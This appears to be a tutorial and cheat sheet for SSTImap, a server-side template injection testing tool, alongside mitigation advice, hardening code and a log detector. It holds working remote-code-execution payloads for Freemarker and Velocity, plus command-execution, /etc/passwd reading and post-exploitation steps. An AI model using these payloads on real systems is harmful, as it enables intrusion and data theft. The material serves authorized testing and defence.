SSTImap
Overview
SSTImap is an automated security testing tool for detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. It identifies the template engine in use and attempts code execution to demonstrate the impact of an SSTI vulnerability.
Key Features
- Automatic template engine detection
- SSTI vulnerability scanning
- Blind and non-blind exploitation
- Multi-payload testing
- Code execution capabilities
- Request/response analysis
- Vulnerability reporting
- Cross-platform support
Important Notice
WARNING: SSTImap should ONLY be used:
- In authorized penetration testing
- With explicit written permission
- On systems you own or control
- In security research environments
- For vulnerability assessment
Unauthorized testing is illegal and unethical.
Use Cases (Authorized)
- Identify SSTI vulnerabilities in web applications
- Test template engine security configurations
- Verify vulnerability remediation
- Security research and education
- Penetration testing with authorization
- Code execution impact demonstration
Installation
From GitHub
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
chmod +x sstimap.py
Python Requirements
# Install dependencies
pip install requests
# Or with requirements file
pip install -r requirements.txt
Verify Installation
python sstimap.py -h
Docker Installation
docker pull sstimap:latest
docker run -it sstimap:latest -h
Basic Concepts
What is SSTI?
Server-Side Template Injection occurs when:
- User input is embedded in template files
- Templates are evaluated server-side
- Insufficient input sanitization exists
- Attacker can inject template directives
Common Vulnerable Templates
| Engine | Language | Usage |
|---|---|---|
| Jinja2 | Python | Flask, Django |
| Twig | PHP | Symfony |
| Freemarker | Java | Spring Boot |
| Velocity | Java | Various frameworks |
| Thymeleaf | Java | Spring |
| ERB | Ruby | Rails |
| Jade/Pug | Node.js | Express |
| EJS | Node.js | Express |
Attack Payload Examples
Jinja2: {{7*7}}
Twig: {{7*7}}
Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Velocity: #set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))$rt.getRuntime().exec('command')
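The mechanism described in the bullets above, as an added example that is not part of SSTImap or this page: the same Jinja2 render written the vulnerable way, the fixed way, and with Jinja2's sandbox, so you can see why the {{7*7}} probe from the payload list comes back as 49 and what each layer does. It assumes the jinja2 package is installed.

```python
# Added example, not code from SSTImap or the original page: the SSTI
# mechanism in Jinja2, using the {{7*7}} probe from the payload list above.
# Assumes the jinja2 package is installed.
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment

PROBE = "{{7*7}}"  # constructed probe, same as the Jinja2/Twig payload above


def render_vulnerable(name: str) -> str:
    """Bug: user input is concatenated into the template SOURCE, so the
    engine compiles and evaluates whatever directives the input contains."""
    return Environment().from_string("Hello " + name).render()


def render_safe(name: str) -> str:
    """Fix: the template is a fixed string and the input only reaches it as
    a context variable, so it is printed as text and never evaluated."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=name)


def render_sandboxed(name: str) -> str:
    """Defence in depth, NOT a fix: the sandbox still evaluates the template
    (7*7 -> 49) but refuses private/internal attributes such as __class__,
    which is what object-walking payloads rely on. Blocked attributes render
    as empty output instead of exposing the object."""
    env = SandboxedEnvironment(autoescape=True)
    return env.from_string("Hello " + name).render()


if __name__ == "__main__":
    print(render_vulnerable(PROBE))    # Hello 49       -> probe was evaluated
    print(render_safe(PROBE))          # Hello {{7*7}}  -> probe treated as data
    print(render_sandboxed(PROBE))     # Hello 49       -> sandbox alone does not help
    print(render_sandboxed("{{ ''.__class__ }}"))  # Hello  -> attribute refused
```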
Installation and Setup
Full Installation
# Clone repository
git clone https://github.com/vladimirmitin/sstimap.git
cd sstimap
# Install dependencies
pip install -r requirements.txt
# Make executable
chmod +x sstimap.py
# Run help
./sstimap.py -h
Alternative: Python Package
pip install sstimap
sstimap.py -h
Basic Usage
Simple Vulnerability Scan
# Scan single URL
python sstimap.py -u "http://vulnerable-site.com/page?name=test"
# Output:
# [*] Testing server-side template injection
# [+] Jinja2 detected in: name parameter
# [+] Vulnerability confirmed
Scan with Custom Payload Parameter
# Test specific parameter
python sstimap.py -u "http://example.com/test?input=PAYLOAD" \
--test-parameter "input"
Output to File
# Save results to file
python sstimap.py -u "http://example.com/?name=test" \
-o results.txt
Verbose Output
# Enable verbose mode for detailed information
python sstimap.py -u "http://example.com/?name=test" \
-v
Advanced Scanning
Template Engine Detection
# Detect template engine without exploitation
python sstimap.py -u "http://vulnerable-app.com/?search=test" \
--detect-only
# Output shows:
# [+] Template engine: Jinja2
# [+] Injection point: search parameter
Test All Parameters
# Automatically test all GET/POST parameters
python sstimap.py -u "http://example.com/?id=1&name=test&type=prod" \
--test-all-params
Blind SSTI Detection
# Test for blind SSTI (time-based)
python sstimap.py -u "http://example.com/?input=test" \
--detect-blind
# Sends payloads that delay the response; a measurable delay shows the template was evaluated even when nothing is reflected in the page
Custom Timeout
# Set custom timeout for responses
python sstimap.py -u "http://example.com/?id=test" \
--timeout 10
Exploitation Techniques
Basic Code Execution
# Test basic math to confirm SSTI
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD" \
--test-expression "7*7"
# Result should show: 49
Command Execution
# Execute OS command
python sstimap.py -u "http://example.com/?input=PAYLOAD" \
--execute-command "id"
# Attempts: whoami, id, cat /etc/passwd, etc.
File Reading
# Read server files
python sstimap.py -u "http://example.com/?file=PAYLOAD" \
--read-file "/etc/passwd"
# Or guess common file paths
python sstimap.py -u "http://example.com/?page=PAYLOAD" \
--read-files
Database Interaction
# Attempt database access via template injection
python sstimap.py -u "http://vulnerable-app.com/?search=PAYLOAD" \
--database
Request Configuration
Custom Headers
# Add authentication headers
python sstimap.py -u "http://example.com/?id=test" \
-H "Authorization: Bearer TOKEN" \
-H "User-Agent: Custom-Agent"
POST Data
# Test POST parameters
python sstimap.py -u "http://example.com/login" \
--data "username=admin&password=test" \
--test-parameter "password"
Cookies
# Include session cookies
python sstimap.py -u "http://example.com/?name=test" \
--cookie "PHPSESSID=abcd1234; admin=false"
Proxy Configuration
# Route through proxy
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080"
# For Burp Suite
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8080" \
--ignore-proxy-warnings
SSL Verification
# Ignore SSL warnings (test environments)
python sstimap.py -u "https://example.com/?input=test" \
--no-ssl-verify
Template Engine Specific Payloads
Jinja2 (Python)
# Test Jinja2
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payloads tested:
# {{7*7}} -> 49
# {{config.items()}}
# {{request.environ}}
Twig (PHP)
# Twig injection test
python sstimap.py -u "http://vulnerable.com/?search=PAYLOAD"
# Payloads:
# {{7*7}} -> 49
# {{_self}}
# {{this.env}}
Freemarker (Java)
# Freemarker payload
python sstimap.py -u "http://vulnerable.com/?input=PAYLOAD"
# Freemarker RCE payload
# <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
Velocity (Java)
# Velocity injection
python sstimap.py -u "http://vulnerable.com/?id=PAYLOAD"
# Math expression: #set($x=7*7)$x
Thymeleaf (Java)
# Thymeleaf template injection
python sstimap.py -u "http://vulnerable.com/?name=PAYLOAD"
# Payload: [[${7*7}]]
Automation and Batch Testing
Scan Multiple URLs
# Test multiple endpoints, one results file per URL
while read -r url; do
    python sstimap.py -u "$url" -o "results_$(date +%s).txt"
done < urls.txt
Bulk Parameter Testing
#!/bin/bash
# Test all parameters in URL list
while read -r url; do
    echo "Testing: $url"
    python sstimap.py -u "$url" \
        --test-all-params \
        -o results.txt
done < urls.txt
Automated Reporting
#!/bin/bash
# Generate report of findings
TARGET="http://vulnerable-app.com"
REPORT="ssti_report_$(date +%Y%m%d).txt"
echo "SSTI Vulnerability Assessment Report" > "$REPORT"
echo "Date: $(date)" >> "$REPORT"
echo "Target: $TARGET" >> "$REPORT"
echo "================================" >> "$REPORT"
# Test all discovered endpoints (stderr is captured too, so warnings end up in the report)
python sstimap.py -u "$TARGET" \
    --test-all-params \
    -v >> "$REPORT" 2>&1
echo "Report saved to: $REPORT"
Output Analysis
Understanding Output
[*] Testing server-side template injection
[+] Detected: Jinja2 in parameter 'name'
[*] Attempting exploitation...
[+] Payload: {{7*7}}
[+] Response: 49
[+] VULNERABILITY CONFIRMED
[*] Attempting code execution...
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Parse Results Script
#!/bin/bash
# Extract vulnerable endpoints (the + must be escaped in an extended regex,
# otherwise "\[+\]" matches a run of "[" characters instead of the literal "[+]")
python sstimap.py -u "http://target.com/?id=test" \
    --test-all-params -v 2>&1 | \
    grep -E '\[\+\]|VULNERABLE' | \
    tee vulnerabilities.log
Exploitation Workflow
Step 1: Reconnaissance
# Map application parameters
python sstimap.py -u "http://target.com/?search=test&category=1" \
--detect-only
Step 2: Template Detection
# Identify template engine
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--detect-template-engine
Step 3: Vulnerability Confirmation
# Confirm SSTI vulnerability
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--test-expression "7*7"
Step 4: Code Execution
# Execute commands
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--execute-command "id"
Step 5: Post-Exploitation
# Read sensitive files
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-file "/etc/passwd"
# Access environment variables
python sstimap.py -u "http://target.com/?search=PAYLOAD" \
--read-env
Integration with Other Tools
Burp Suite Integration
# Use SSTImap through Burp proxy
python sstimap.py -u "http://example.com/?param=test" \
--proxy "http://127.0.0.1:8080"
# Intercept and modify requests in Burp
# Then test with SSTImap
OWASP ZAP Integration
# Export ZAP findings and test with SSTImap
python sstimap.py -u "http://example.com/?id=test" \
--proxy "http://127.0.0.1:8090"
Metasploit Integration
# Use findings from SSTImap in Metasploit
# 1. Run SSTImap to identify SSTI
# 2. Use template-specific exploits in Metasploit
# 3. Gain shell access via template injection
Prevention and Mitigation
Secure Coding Practices
1. Input Validation
- Whitelist allowed characters
- Reject suspicious patterns
- Length restrictions
2. Template Sandboxing
- Use restricted templates
- Disable dangerous functions
- Limit object access
3. Context Separation
- Don't mix code with templates
- Use template escaping
- Separate logic from presentation
4. Security Configuration
- Disable debug mode in production
- Restrict file access
- Limit available functions
Jinja2 Hardening Example
from jinja2 import select_autoescape
from jinja2.sandbox import SandboxedEnvironment
# Create a restricted environment. jinja2.Environment has no sandbox=True option;
# the sandbox is a separate environment class that refuses access to private and
# internal attributes (for example __class__ or __globals__) during rendering.
env = SandboxedEnvironment(
    autoescape=select_autoescape(['html', 'xml'])
)
# Never compile user input as a template: keep the template source fixed and
# pass untrusted data in as a variable, so it is rendered as text, not evaluated
template = env.from_string("<p>Hello {{ name }}</p>")
result = template.render(name=user_input)
Detection Patterns
Suspicious patterns to monitor:
- {{7*7}}-style probes in requests, and responses in which such a probe comes back as 49
- {% ... %} statement blocks in request parameters
- Attempts to reach application objects from a parameter (such as the {{config.items()}} and {{request.environ}} probes listed above)
- File read attempts
- OS command patterns
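A detector for the request-side patterns in the list above, added here as an example that is not part of SSTImap or this page. It runs over constructed access-log lines in common log format, URL-decodes each query parameter (probes normally arrive percent-encoded) and flags the template syntax of the engines from the table above; it assumes Python 3.9+ and uses only the standard library.

```python
# Added example, not code from SSTImap or the original page: a detector for
# the request-side patterns listed above, run over constructed access-log
# lines in common log format. Assumes Python 3.9+ (standard library only).
import re
from urllib.parse import parse_qsl, urlsplit

# Template syntax that has no business in a user-supplied parameter.
PATTERNS = {
    "jinja2/twig expression": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja2/twig statement": re.compile(r"\{%.*?%\}", re.S),
    "freemarker directive": re.compile(r"<#\w+"),
    "velocity directive": re.compile(r"#set\s*\("),
    "dollar expression": re.compile(r"\$\{.*?\}", re.S),
    "object access": re.compile(r"__class__|__globals__|\.class\.forName|config\.items"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)$"
)

# Constructed sample: one clean request, then four probes of the kinds above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /page?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 49
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%7B%25+for+x+in+y+%25%7D HTTP/1.1" 200 1024
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /report?tpl=%3C%23assign+ex%3D%22x%22%3E HTTP/1.1" 500 0
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /page?name=%24%7B7*7%7D HTTP/1.1" 200 200
"""


def scan_log(text: str) -> list[dict]:
    """Return one finding per (request, parameter, pattern) hit."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real pipeline would count these
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes values, so encoded probes are matched as written
        for param, value in parse_qsl(query, keep_blank_values=True):
            for label, rx in PATTERNS.items():
                if rx.search(value):
                    findings.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                                     "value": value, "pattern": label})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r}: {f['pattern']}")
```

The response-side check in the list (a {{7*7}} probe answered with 49) needs the response body, which access logs do not carry, so it belongs in an application log or a WAF that records bodies.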
Troubleshooting
Tool Not Finding Vulnerabilities
Issue: SSTI exists but SSTImap doesn’t detect it.
Solution:
# Try manual testing
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
-v
# Test with custom payload
python sstimap.py -u "http://example.com/?id=PAYLOAD" \
--payload "{{7*7}}"
# Different parameter
python sstimap.py -u "http://example.com/?name=PAYLOAD" \
--test-parameter "name"
Connection Issues
Issue: Unable to connect to target.
Solution:
# Test connectivity
curl http://target.com/?id=test
# Try with verbose
python sstimap.py -u "http://target.com/?id=test" \
-v
# Use proxy if needed
python sstimap.py -u "http://target.com/?id=test" \
--proxy "http://127.0.0.1:8080"
False Positives
Issue: Tool reports vulnerabilities that don’t exist.
Solution:
# Verify manually
# 1. Submit test payload: {{7*7}}
# 2. Check if response shows: 49
# 3. Confirm with different payloads
# Test with blind detection
python sstimap.py -u "http://target.com/?id=test" \
--detect-blind
Security Considerations
Authorized Testing Only
Before testing:
✓ Obtain written authorization
✓ Define scope clearly
✓ Document test plan
✓ Get legal review
✓ Maintain confidentiality
Data Protection
# Encrypt sensitive findings
gpg -e -r recipient@company.com report.txt
# Secure deletion
shred -vfz report.txt
# Audit trail
echo "$(date): SSTI testing completed" >> audit.log
References
- GitHub: vladimirmitin/sstimap
- OWASP: Server-Side Template Injection
- PortSwigger: SSTI Tutorial
- CVE Database: Search SSTI vulnerabilities
Quick Reference
# Basic scan
python sstimap.py -u "http://vulnerable.com/?id=test"
# Detect template engine
python sstimap.py -u "http://vulnerable.com/?id=test" --detect-only
# Execute command
python sstimap.py -u "http://vulnerable.com/?id=test" --execute-command "id"
# Read file
python sstimap.py -u "http://vulnerable.com/?id=test" --read-file "/etc/passwd"
# Test all parameters
python sstimap.py -u "http://vulnerable.com/?a=1&b=2&c=3" --test-all-params
# Verbose output
python sstimap.py -u "http://vulnerable.com/?id=test" -v
# Save results
python sstimap.py -u "http://vulnerable.com/?id=test" -o results.txt
# With proxy
python sstimap.py -u "http://vulnerable.com/?id=test" --proxy "http://127.0.0.1:8080"
# Custom headers
python sstimap.py -u "http://vulnerable.com/?id=test" \
-H "Authorization: Bearer TOKEN"